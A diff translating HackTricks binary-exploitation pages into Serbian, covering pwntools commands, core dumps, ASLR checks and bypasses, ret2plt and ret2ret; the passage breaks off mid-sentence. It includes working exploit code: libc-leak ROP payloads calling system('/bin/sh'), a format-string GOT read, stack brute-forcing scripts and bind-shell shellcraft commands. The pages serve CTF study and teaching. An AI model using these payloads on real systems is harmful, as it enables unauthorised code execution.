--process bash ``` +**Može se odabrati:** -**Can select:** - -- By executable, by name or by pid context (16,32,64,linux,windows...) -- gdbscript to execute +- Po izvršnom fajlu, po imenu ili po pid kontekstu (16,32,64,linux,windows...) +- gdbscript za izvršavanje - sysrootpath ## Pwn disablenx -Disable nx of a binary - +Onemogući nx binarnog fajla ``` pwn disablenx ``` - ## Pwn disasm -Disas hex opcodes - +Disas hex opkode ``` pwn disasm ffe4 ``` +**Može se odabrati:** -**Can select:** - -- context (16,32,64,linux,windows...) -- base addres -- color(default)/no color +- kontekst (16,32,64,linux,windows...) +- osnovna adresa +- boja(podrazumevano)/bez boje ## Pwn elfdiff -Print differences between 2 files - +Ispisuje razlike između 2 datoteke ``` pwn elfdiff ``` - ## Pwn hex -Get hexadecimal representation - +Dobijte heksadecimalnu reprezentaciju ```bash pwn hex hola #Get hex of "hola" ascii ``` - ## Pwn phd -Get hexdump - +Dobij hexdump ``` pwn phd ``` +**Može se odabrati:** -**Can select:** - -- Number of bytes to show -- Number of bytes per line highlight byte -- Skip bytes at beginning +- Broj bajtova za prikaz +- Broj bajtova po liniji istaknutog bajta +- Preskoči bajtove na početku ## Pwn pwnstrip @@ -122,8 +102,7 @@ pwn phd ## Pwn shellcraft -Get shellcodes - +Dobijanje shellcode-ova ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name @@ -131,46 +110,39 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` +**Može se izabrati:** -**Can select:** +- shellcode i argumenti za shellcode +- Izlazna datoteka +- format izlaza +- debagovanje (priključiti dbg na shellcode) +- pre (debug trap pre koda) +- posle +- izbegavati korišćenje opkoda (podrazumevano: ne null i nova linija) +- Pokreni shellcode +- Boja/bez boje +- lista syscalls +- lista mogućih shellcode-ova +- Generiši ELF kao deljenu biblioteku -- shellcode and arguments for the shellcode -- Out file -- output format -- debug (attach dbg to shellcode) -- before (debug trap before code) -- after -- avoid using opcodes (default: not null and new line) -- Run the shellcode -- Color/no color -- list syscalls -- list possible shellcodes -- Generate ELF as a shared library - -## Pwn template - -Get a python template +## Pwn šablon +Dobijte python šablon ``` pwn template ``` - -**Can select:** host, port, user, pass, path and quiet +**Može se odabrati:** host, port, user, pass, path i quiet ## Pwn unhex -From hex to string - +Iz heksadecimalnog u string ``` pwn unhex 686f6c61 ``` +## Pwn ažuriranje -## Pwn update - -To update pwntools - +Da ažurirate pwntools ``` pwn update ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md index 47681ba71..929ee4e69 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md @@ -1,35 +1,29 @@ -# Common Binary Exploitation Protections & Bypasses +# Uobičajene zaštite i zaobilaženja u binarnom eksploatisanju {{#include ../../banners/hacktricks-training.md}} -## Enable Core files +## Omogućite Core datoteke -**Core files** are a type of file generated by an operating system when a process crashes. These files capture the memory image of the crashed process at the time of its termination, including the process's memory, registers, and program counter state, among other details. This snapshot can be extremely valuable for debugging and understanding why the crash occurred. +**Core datoteke** su vrsta datoteke koju generiše operativni sistem kada proces doživi pad. Ove datoteke beleže sliku memorije padenog procesa u trenutku njegovog završetka, uključujući memoriju procesa, registre i stanje programskog brojača, među ostalim detaljima. Ova slika može biti izuzetno korisna za debagovanje i razumevanje zašto je došlo do pada. -### **Enabling Core Dump Generation** +### **Omogućavanje generisanja Core dump-a** -By default, many systems limit the size of core files to 0 (i.e., they do not generate core files) to save disk space. To enable the generation of core files, you can use the **`ulimit`** command (in bash or similar shells) or configure system-wide settings. - -- **Using ulimit**: The command `ulimit -c unlimited` allows the current shell session to create unlimited-sized core files. This is useful for debugging sessions but is not persistent across reboots or new sessions. +Podrazumevano, mnogi sistemi ograničavaju veličinu core datoteka na 0 (tj. ne generišu core datoteke) kako bi uštedeli prostor na disku. Da biste omogućili generisanje core datoteka, možete koristiti komandu **`ulimit`** (u bash-u ili sličnim shell-ovima) ili konfigurisati sistemske postavke. +- **Korišćenje ulimit**: Komanda `ulimit -c unlimited` omogućava trenutnoj shell sesiji da kreira core datoteke neograničene veličine. Ovo je korisno za debagovanje sesija, ali nije trajno nakon ponovnog pokretanja ili novih sesija. ```bash ulimit -c unlimited ``` - -- **Persistent Configuration**: For a more permanent solution, you can edit the `/etc/security/limits.conf` file to include a line like `* soft core unlimited`, which allows all users to generate unlimited size core files without having to set ulimit manually in their sessions. - +- **Trajna Konfiguracija**: Za trajno rešenje, možete urediti datoteku `/etc/security/limits.conf` da uključite liniju kao što je `* soft core unlimited`, koja omogućava svim korisnicima da generišu core datoteke neograničene veličine bez potrebe da ručno postavljaju ulimit u svojim sesijama. ```markdown - soft core unlimited ``` +### **Analiza Core Fajlova sa GDB** -### **Analyzing Core Files with GDB** - -To analyze a core file, you can use debugging tools like GDB (the GNU Debugger). Assuming you have an executable that produced a core dump and the core file is named `core_file`, you can start the analysis with: - +Da biste analizirali core fajl, možete koristiti alate za debagovanje kao što je GDB (GNU Debugger). Pretpostavljajući da imate izvršni fajl koji je proizveo core dump i da se core fajl zove `core_file`, možete započeti analizu sa: ```bash gdb /path/to/executable /path/to/core_file ``` - -This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash. +Ova komanda učitava izvršni fajl i core fajl u GDB, omogućavajući vam da pregledate stanje programa u trenutku pada. Možete koristiti GDB komande da istražite stek, ispitujete promenljive i razumete uzrok pada. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index e33c7a3be..d9792b187 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -2,107 +2,92 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -**Address Space Layout Randomization (ASLR)** is a security technique used in operating systems to **randomize the memory addresses** used by system and application processes. By doing so, it makes it significantly harder for an attacker to predict the location of specific processes and data, such as the stack, heap, and libraries, thereby mitigating certain types of exploits, particularly buffer overflows. +**Address Space Layout Randomization (ASLR)** je tehnika bezbednosti koja se koristi u operativnim sistemima za **randomizaciju memorijskih adresa** koje koriste sistemski i aplikativni procesi. Na taj način, značajno otežava napadaču da predvidi lokaciju specifičnih procesa i podataka, kao što su stek, heap i biblioteke, čime se ublažavaju određene vrste eksploatacija, posebno prelivanja bafera. -### **Checking ASLR Status** +### **Proveravanje ASLR Statusa** -To **check** the ASLR status on a Linux system, you can read the value from the **`/proc/sys/kernel/randomize_va_space`** file. The value stored in this file determines the type of ASLR being applied: +Da biste **proverili** ASLR status na Linux sistemu, možete pročitati vrednost iz **`/proc/sys/kernel/randomize_va_space`** datoteke. Vrednost koja se čuva u ovoj datoteci određuje tip ASLR-a koji se primenjuje: -- **0**: No randomization. Everything is static. -- **1**: Conservative randomization. Shared libraries, stack, mmap(), VDSO page are randomized. -- **2**: Full randomization. In addition to elements randomized by conservative randomization, memory managed through `brk()` is randomized. - -You can check the ASLR status with the following command: +- **0**: Nema randomizacije. Sve je statično. +- **1**: Konzervativna randomizacija. Deljene biblioteke, stek, mmap(), VDSO stranica su randomizovane. +- **2**: Potpuna randomizacija. Pored elemenata randomizovanih konzervativnom randomizacijom, memorija koja se upravlja putem `brk()` je randomizovana. +Možete proveriti ASLR status sledećom komandom: ```bash cat /proc/sys/kernel/randomize_va_space ``` +### **Onemogućavanje ASLR-a** -### **Disabling ASLR** - -To **disable** ASLR, you set the value of `/proc/sys/kernel/randomize_va_space` to **0**. Disabling ASLR is generally not recommended outside of testing or debugging scenarios. Here's how you can disable it: - +Da biste **onemogućili** ASLR, postavite vrednost `/proc/sys/kernel/randomize_va_space` na **0**. Onemogućavanje ASLR-a se generalno ne preporučuje van testiranja ili debagovanja. Evo kako možete to da uradite: ```bash echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` - -You can also disable ASLR for an execution with: - +Možete takođe onemogućiti ASLR za izvršavanje sa: ```bash setarch `arch` -R ./bin args setarch `uname -m` -R ./bin args ``` +### **Omogućavanje ASLR** -### **Enabling ASLR** - -To **enable** ASLR, you can write a value of **2** to the `/proc/sys/kernel/randomize_va_space` file. This typically requires root privileges. Enabling full randomization can be done with the following command: - +Da biste **omogućili** ASLR, možete napisati vrednost **2** u datoteku `/proc/sys/kernel/randomize_va_space`. To obično zahteva root privilegije. Puno nasumično raspoređivanje može se izvršiti sledećom komandom: ```bash echo 2 | sudo tee /proc/sys/kernel/randomize_va_space ``` +### **Persistencija kroz ponovna pokretanja** -### **Persistence Across Reboots** - -Changes made with the `echo` commands are temporary and will be reset upon reboot. To make the change persistent, you need to edit the `/etc/sysctl.conf` file and add or modify the following line: - +Promene napravljene sa `echo` komandama su privremene i biće resetovane prilikom ponovnog pokretanja. Da biste promenu učinili trajnom, potrebno je da uredite datoteku `/etc/sysctl.conf` i dodate ili izmenite sledeću liniju: ```tsconfig kernel.randomize_va_space=2 # Enable ASLR # or kernel.randomize_va_space=0 # Disable ASLR ``` - -After editing `/etc/sysctl.conf`, apply the changes with: - +Nakon uređivanja `/etc/sysctl.conf`, primenite promene sa: ```bash sudo sysctl -p ``` +Ovo će osigurati da vaša ASLR podešavanja ostanu nakon ponovnog pokretanja. -This will ensure that your ASLR settings remain across reboots. - -## **Bypasses** +## **Obilaženja** ### 32bit brute-forcing -PaX divides the process address space into **3 groups**: +PaX deli adresni prostor procesa na **3 grupe**: -- **Code and data** (initialized and uninitialized): `.text`, `.data`, and `.bss` —> **16 bits** of entropy in the `delta_exec` variable. This variable is randomly initialized with each process and added to the initial addresses. -- **Memory** allocated by `mmap()` and **shared libraries** —> **16 bits**, named `delta_mmap`. -- **The stack** —> **24 bits**, referred to as `delta_stack`. However, it effectively uses **11 bits** (from the 10th to the 20th byte inclusive), aligned to **16 bytes** —> This results in **524,288 possible real stack addresses**. +- **Kod i podaci** (inicijalizovani i neinicijalizovani): `.text`, `.data`, i `.bss` —> **16 bita** entropije u `delta_exec` varijabli. Ova varijabla se nasumično inicijalizuje sa svakim procesom i dodaje se početnim adresama. +- **Memorija** alocirana pomoću `mmap()` i **deljene biblioteke** —> **16 bita**, nazvana `delta_mmap`. +- **Stek** —> **24 bita**, nazvana `delta_stack`. Međutim, efektivno koristi **11 bita** (od 10. do 20. bajta uključivo), poravnato na **16 bajtova** —> Ovo rezultira sa **524,288 mogućih stvarnih adresa steka**. -The previous data is for 32-bit systems and the reduced final entropy makes possible to bypass ASLR by retrying the execution once and again until the exploit completes successfully. +Prethodni podaci su za 32-bitne sisteme, a smanjena konačna entropija omogućava obilaženje ASLR ponovnim pokušajem izvršavanja iznova i iznova dok se eksploatacija ne završi uspešno. -#### Brute-force ideas: - -- If you have a big enough overflow to host a **big NOP sled before the shellcode**, you could just brute-force addresses in the stack until the flow **jumps over some part of the NOP sled**. - - Another option for this in case the overflow is not that big and the exploit can be run locally is possible to **add the NOP sled and shellcode in an environment variable**. -- If the exploit is local, you can try to brute-force the base address of libc (useful for 32bit systems): +#### Ideje za brute-force: +- Ako imate dovoljno veliki overflow da smestite **veliki NOP sled pre shellcode-a**, mogli biste jednostavno brute-force adrese na steku dok tok **ne preskoči neki deo NOP sled-a**. +- Druga opcija za ovo, u slučaju da overflow nije toliko veliki i da se eksploatacija može pokrenuti lokalno, je moguće **dodati NOP sled i shellcode u promenljivu okruženja**. +- Ako je eksploatacija lokalna, možete pokušati da brute-force osnovnu adresu libc (korisno za 32bitne sisteme): ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` - -- If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function. +- Ako napadate udaljeni server, možete pokušati da **brute-force-ujete adresu funkcije `libc` `usleep`**, prosledjujući kao argument 10 (na primer). Ako u nekom trenutku **serveru treba dodatnih 10s da odgovori**, pronašli ste adresu ove funkcije. > [!TIP] -> In 64bit systems the entropy is much higher and this shouldn't possible. +> U 64-bitnim sistemima entropija je mnogo veća i ovo ne bi trebalo da bude moguće. -### 64 bits stack brute-forcing - -It's possible to occupy a big part of the stack with env variables and then try to abuse the binary hundreds/thousands of times locally to exploit it.\ -The following code shows how it's possible to **just select an address in the stack** and every **few hundreds of executions** that address will contain the **NOP instruction**: +### Brute-forcing 64-bitnog steka +Moguće je zauzeti veliki deo steka sa env varijablama i zatim pokušati da zloupotrebite binarni fajl stotine/hiljade puta lokalno da biste ga iskoristili.\ +Sledeći kod pokazuje kako je moguće **samo odabrati adresu u steku** i svaka **nekoliko stotina izvršenja** ta adresa će sadržati **NOP instrukciju**: ```c //clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie #include int main() { - unsigned long long address = 0xffffff1e7e38; - unsigned int* ptr = (unsigned int*)address; - unsigned int value = *ptr; - printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value); - return 0; +unsigned long long address = 0xffffff1e7e38; +unsigned int* ptr = (unsigned int*)address; +unsigned int value = *ptr; +printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value); +return 0; } ``` @@ -117,70 +102,68 @@ shellcode_env_var = nop * n_nops # Define the environment variables you want to set env_vars = { - 'a': shellcode_env_var, - 'b': shellcode_env_var, - 'c': shellcode_env_var, - 'd': shellcode_env_var, - 'e': shellcode_env_var, - 'f': shellcode_env_var, - 'g': shellcode_env_var, - 'h': shellcode_env_var, - 'i': shellcode_env_var, - 'j': shellcode_env_var, - 'k': shellcode_env_var, - 'l': shellcode_env_var, - 'm': shellcode_env_var, - 'n': shellcode_env_var, - 'o': shellcode_env_var, - 'p': shellcode_env_var, +'a': shellcode_env_var, +'b': shellcode_env_var, +'c': shellcode_env_var, +'d': shellcode_env_var, +'e': shellcode_env_var, +'f': shellcode_env_var, +'g': shellcode_env_var, +'h': shellcode_env_var, +'i': shellcode_env_var, +'j': shellcode_env_var, +'k': shellcode_env_var, +'l': shellcode_env_var, +'m': shellcode_env_var, +'n': shellcode_env_var, +'o': shellcode_env_var, +'p': shellcode_env_var, } cont = 0 while True: - cont += 1 +cont += 1 - if cont % 10000 == 0: - break +if cont % 10000 == 0: +break - print(cont, end="\r") - # Define the path to your binary - binary_path = './aslr-testing' +print(cont, end="\r") +# Define the path to your binary +binary_path = './aslr-testing' - try: - process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True) - output = process.communicate()[0] - if "0xd5" in str(output): - print(str(cont) + " -> " + output) - except Exception as e: - print(e) - print(traceback.format_exc()) - pass +try: +process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True) +output = process.communicate()[0] +if "0xd5" in str(output): +print(str(cont) + " -> " + output) +except Exception as e: +print(e) +print(traceback.format_exc()) +pass ``` -
-### Local Information (`/proc/[pid]/stat`) +### Lokalne informacije (`/proc/[pid]/stat`) -The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as: +Datoteka **`/proc/[pid]/stat`** procesa je uvek čitljiva za sve i **sadrži zanimljive** informacije kao što su: -- **startcode** & **endcode**: Addresses above and below with the **TEXT** of the binary -- **startstack**: The address of the start of the **stack** -- **start_data** & **end_data**: Addresses above and below where the **BSS** is -- **kstkesp** & **kstkeip**: Current **ESP** and **EIP** addresses -- **arg_start** & **arg_end**: Addresses above and below where **cli arguments** are. -- **env_start** &**env_end**: Addresses above and below where **env variables** are. +- **startcode** & **endcode**: Adrese iznad i ispod sa **TEXT**-om binarnog fajla +- **startstack**: Adresa početka **stack**-a +- **start_data** & **end_data**: Adrese iznad i ispod gde se nalazi **BSS** +- **kstkesp** & **kstkeip**: Trenutne **ESP** i **EIP** adrese +- **arg_start** & **arg_end**: Adrese iznad i ispod gde su **cli argumenti**. +- **env_start** &**env_end**: Adrese iznad i ispod gde su **env varijable**. -Therefore, if the attacker is in the same computer as the binary being exploited and this binary doesn't expect the overflow from raw arguments, but from a different **input that can be crafted after reading this file**. It's possible for an attacker to **get some addresses from this file and construct offsets from them for the exploit**. +Dakle, ako je napadač na istom računaru kao i binarni fajl koji se eksploatiše i ovaj binarni fajl ne očekuje prelivanje iz sirovih argumenata, već iz različitog **ulaza koji se može kreirati nakon čitanja ove datoteke**. Moguće je da napadač **dobije neke adrese iz ove datoteke i konstruira ofsete iz njih za eksploataciju**. > [!TIP] -> For more info about this file check [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html) searching for `/proc/pid/stat` +> Za više informacija o ovoj datoteci proverite [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html) pretražujući `/proc/pid/stat` -### Having a leak +### Imati leak -- **The challenge is giving a leak** - -If you are given a leak (easy CTF challenges), you can calculate offsets from it (supposing for example that you know the exact libc version that is used in the system you are exploiting). This example exploit is extract from the [**example from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (check that page for more details): +- **Izazov je dati leak** +Ako dobijete leak (laki CTF izazovi), možete izračunati ofsete iz njega (pretpostavljajući na primer da znate tačnu verziju libc koja se koristi u sistemu koji eksploatišete). Ovaj primer eksploatacije je izvučen iz [**primera ovde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (proverite tu stranicu za više detalja): ```python from pwn import * @@ -195,20 +178,19 @@ libc.address = system_leak - libc.sym['system'] log.success(f'LIBC base: {hex(libc.address)}') payload = flat( - 'A' * 32, - libc.sym['system'], - 0x0, # return address - next(libc.search(b'/bin/sh')) +'A' * 32, +libc.sym['system'], +0x0, # return address +next(libc.search(b'/bin/sh')) ) p.sendline(payload) p.interactive() ``` - - **ret2plt** -Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check: +Zloupotrebljavajući buffer overflow, bilo bi moguće iskoristiti **ret2plt** za eksfiltraciju adrese funkcije iz libc. Proverite: {{#ref}} ret2plt.md @@ -216,8 +198,7 @@ ret2plt.md - **Format Strings Arbitrary Read** -Just like in ret2plt, if you have an arbitrary read via a format strings vulnerability it's possible to exfiltrate te address of a **libc function** from the GOT. The following [**example is from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got): - +Baš kao u ret2plt, ako imate proizvoljno čitanje putem ranjivosti format stringova, moguće je eksfiltrirati adresu **libc funkcije** iz GOT-a. Sledeći [**primer je odavde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got): ```python payload = p32(elf.got['puts']) # p64() if 64-bit payload += b'|' @@ -228,8 +209,7 @@ payload += b'%3$s' # The third parameter points at the start of the payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer payload += p32(elf.symbols['main']) ``` - -You can find more info about Format Strings arbitrary read in: +Možete pronaći više informacija o Format Strings proizvoljnom čitanju u: {{#ref}} ../../format-strings/ @@ -237,7 +217,7 @@ You can find more info about Format Strings arbitrary read in: ### Ret2ret & Ret2pop -Try to bypass ASLR abusing addresses inside the stack: +Pokušajte da zaobiđete ASLR zloupotrebom adresa unutar steka: {{#ref}} ret2ret.md @@ -245,13 +225,12 @@ ret2ret.md ### vsyscall -The **`vsyscall`** mechanism serves to enhance performance by allowing certain system calls to be executed in user space, although they are fundamentally part of the kernel. The critical advantage of **vsyscalls** lies in their **fixed addresses**, which are not subject to **ASLR** (Address Space Layout Randomization). This fixed nature means that attackers do not require an information leak vulnerability to determine their addresses and use them in an exploit.\ -However, no super interesting gadgets will be find here (although for example it's possible to get a `ret;` equivalent) +**`vsyscall`** mehanizam služi za poboljšanje performansi omogućavajući izvršavanje određenih sistemskih poziva u korisničkom prostoru, iako su oni suštinski deo jezgra. Kritična prednost **vsyscall-a** leži u njihovim **fiksnim adresama**, koje nisu podložne **ASLR** (Randomizacija rasporeda adresnog prostora). Ova fiksna priroda znači da napadači ne zahtevaju ranjivost za curenje informacija da bi odredili svoje adrese i koristili ih u eksploatu.\ +Međutim, ovde se neće naći super zanimljivi gadgeti (iako je, na primer, moguće dobiti ekvivalent `ret;`) -(The following example and code is [**from this writeup**](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html#exploitation)) - -For instance, an attacker might use the address `0xffffffffff600800` within an exploit. While attempting to jump directly to a `ret` instruction might lead to instability or crashes after executing a couple of gadgets, jumping to the start of a `syscall` provided by the **vsyscall** section can prove successful. By carefully placing a **ROP** gadget that leads execution to this **vsyscall** address, an attacker can achieve code execution without needing to bypass **ASLR** for this part of the exploit. +(Sledeći primer i kod su [**iz ovog izveštaja**](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html#exploitation)) +Na primer, napadač može koristiti adresu `0xffffffffff600800` unutar eksploata. Dok pokušaj da se direktno skoči na `ret` instrukciju može dovesti do nestabilnosti ili rušenja nakon izvršavanja nekoliko gadgeta, skakanje na početak `syscall`-a koji pruža **vsyscall** sekcija može biti uspešno. Pažljivim postavljanjem **ROP** gadgeta koji vodi izvršavanje na ovu **vsyscall** adresu, napadač može postići izvršavanje koda bez potrebe da zaobiđe **ASLR** za ovaj deo eksploata. ``` ef➤ vmmap Start End Offset Perm Path @@ -282,20 +261,19 @@ gef➤ x/8g 0xffffffffff600000 0xffffffffff600020: 0xcccccccccccccccc 0xcccccccccccccccc 0xffffffffff600030: 0xcccccccccccccccc 0xcccccccccccccccc gef➤ x/4i 0xffffffffff600800 - 0xffffffffff600800: mov rax,0x135 - 0xffffffffff600807: syscall - 0xffffffffff600809: ret - 0xffffffffff60080a: int3 +0xffffffffff600800: mov rax,0x135 +0xffffffffff600807: syscall +0xffffffffff600809: ret +0xffffffffff60080a: int3 gef➤ x/4i 0xffffffffff600800 - 0xffffffffff600800: mov rax,0x135 - 0xffffffffff600807: syscall - 0xffffffffff600809: ret - 0xffffffffff60080a: int3 +0xffffffffff600800: mov rax,0x135 +0xffffffffff600807: syscall +0xffffffffff600809: ret +0xffffffffff60080a: int3 ``` - ### vDSO -Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check: +Napomena, stoga, kako bi moglo biti moguće **zaobići ASLR koristeći vdso** ako je kernel kompajliran sa CONFIG_COMPAT_VDSO, jer adresa vdso neće biti nasumična. Za više informacija proverite: {{#ref}} ../../rop-return-oriented-programing/ret2vdso.md diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md index c0e55129b..d6acb86e5 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md @@ -2,40 +2,37 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -The goal of this technique would be to **leak an address from a function from the PLT** to be able to bypass ASLR. This is because if, for example, you leak the address of the function `puts` from the libc, you can then **calculate where is the base of `libc`** and calculate offsets to access other functions such as **`system`**. - -This can be done with a `pwntools` payload such as ([**from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)): +Cilj ove tehnike bi bio da **izvuče adresu iz funkcije iz PLT-a** kako bi se moglo zaobići ASLR. To je zato što, na primer, ako izvučete adresu funkcije `puts` iz libc-a, možete zatim **izračunati gde je osnova `libc`** i izračunati ofsete za pristup drugim funkcijama kao što su **`system`**. +Ovo se može uraditi sa `pwntools` payload-om kao što je ([**odavde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)): ```python # 32-bit ret2plt payload = flat( - b'A' * padding, - elf.plt['puts'], - elf.symbols['main'], - elf.got['puts'] +b'A' * padding, +elf.plt['puts'], +elf.symbols['main'], +elf.got['puts'] ) # 64-bit payload = flat( - b'A' * padding, - POP_RDI, - elf.got['puts'] - elf.plt['puts'], - elf.symbols['main'] +b'A' * padding, +POP_RDI, +elf.got['puts'] +elf.plt['puts'], +elf.symbols['main'] ) ``` +Napomena kako se **`puts`** (koristeći adresu iz PLT-a) poziva sa adresom `puts` koja se nalazi u GOT-u (Global Offset Table). To je zato što do trenutka kada `puts` ispiše GOT unos `puts`, ovaj **unos će sadržati tačnu adresu `puts` u memoriji**. -Note how **`puts`** (using the address from the PLT) is called with the address of `puts` located in the GOT (Global Offset Table). This is because by the time `puts` prints the GOT entry of puts, this **entry will contain the exact address of `puts` in memory**. - -Also note how the address of `main` is used in the exploit so when `puts` ends its execution, the **binary calls `main` again instead of exiting** (so the leaked address will continue to be valid). +Takođe, obratite pažnju kako se adresa `main` koristi u eksploitu, tako da kada `puts` završi svoju izvršavanje, **binarni program ponovo poziva `main` umesto da izlazi** (tako da će otkrivena adresa ostati važeća). > [!CAUTION] -> Note how in order for this to work the **binary cannot be compiled with PIE** or you must have **found a leak to bypass PIE** in order to know the address of the PLT, GOT and main. Otherwise, you need to bypass PIE first. - -You can find a [**full example of this bypass here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). This was the final exploit from that **example**: +> Napomena kako da bi ovo funkcionisalo, **binarni program ne može biti kompajliran sa PIE** ili morate **pronaći leak da zaobiđete PIE** kako biste znali adresu PLT-a, GOT-a i main. U suprotnom, prvo morate zaobići PIE. +Možete pronaći [**potpun primer ovog zaobilaženja ovde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). Ovo je bio konačni exploit iz tog **primera**: ```python from pwn import * @@ -46,10 +43,10 @@ p = process() p.recvline() payload = flat( - 'A' * 32, - elf.plt['puts'], - elf.sym['main'], - elf.got['puts'] +'A' * 32, +elf.plt['puts'], +elf.sym['main'], +elf.got['puts'] ) p.sendline(payload) @@ -61,22 +58,21 @@ libc.address = puts_leak - libc.sym['puts'] log.success(f'LIBC base: {hex(libc.address)}') payload = flat( - 'A' * 32, - libc.sym['system'], - libc.sym['exit'], - next(libc.search(b'/bin/sh\x00')) +'A' * 32, +libc.sym['system'], +libc.sym['exit'], +next(libc.search(b'/bin/sh\x00')) ) p.sendline(payload) p.interactive() ``` - -## Other examples & References +## Drugi primeri i reference - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) - - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')` +- 64 bita, ASLR omogućen, ali bez PIE, prvi korak je popuniti prelivanje do bajta 0x00 kanarija, a zatim pozvati puts i otkriti ga. Sa kanarijom se kreira ROP gadget za pozivanje puts da bi se otkrila adresa puts iz GOT-a i zatim ROP gadget za pozivanje `system('/bin/sh')` - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html) - - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget. +- 64 bita, ASLR omogućen, bez kanarija, prelivanje steka u main iz funkcije deteta. ROP gadget za pozivanje puts da bi se otkrila adresa puts iz GOT-a, a zatim pozvati jedan gadget. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md index 19f39dac3..1b2071aa0 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md @@ -4,27 +4,27 @@ ## Ret2ret -The main **goal** of this technique is to try to **bypass ASLR by abusing an existing pointer in the stack**. +Glavni **cilj** ove tehnike je da pokuša da **obiđe ASLR zloupotrebom postojećeg pokazivača na steku**. -Basically, stack overflows are usually caused by strings, and **strings end with a null byte at the end** in memory. This allows to try to reduce the place pointed by na existing pointer already existing n the stack. So if the stack contained `0xbfffffdd`, this overflow could transform it into `0xbfffff00` (note the last zeroed byte). +U suštini, prelivanja steka obično uzrokuju stringovi, a **stringovi se završavaju nul bajtom na kraju** u memoriji. Ovo omogućava da se pokuša smanjiti mesto na koje pokazuje postojeći pokazivač na steku. Dakle, ako je stek sadržavao `0xbfffffdd`, ovo prelivanje bi moglo da ga transformiše u `0xbfffff00` (obratite pažnju na poslednji nulti bajt). -If that address points to our shellcode in the stack, it's possible to make the flow reach that address by **adding addresses to the `ret` instruction** util this one is reached. +Ako ta adresa pokazuje na naš shellcode na steku, moguće je usmeriti tok ka toj adresi dodavanjem adresa u **`ret` instrukciju** dok se ne dostigne. -Therefore the attack would be like this: +Stoga bi napad izgledao ovako: -- NOP sled +- NOP klizaljka - Shellcode -- Overwrite the stack from the EIP with **addresses to `ret`** (RET sled) -- 0x00 added by the string modifying an address from the stack making it point to the NOP sled +- Prepisivanje steka iz EIP-a sa **adresama do `ret`** (RET klizaljka) +- 0x00 dodat od stringa modifikujući adresu sa steka tako da pokazuje na NOP klizaljku -Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c) you can see an example of a vulnerable binary and 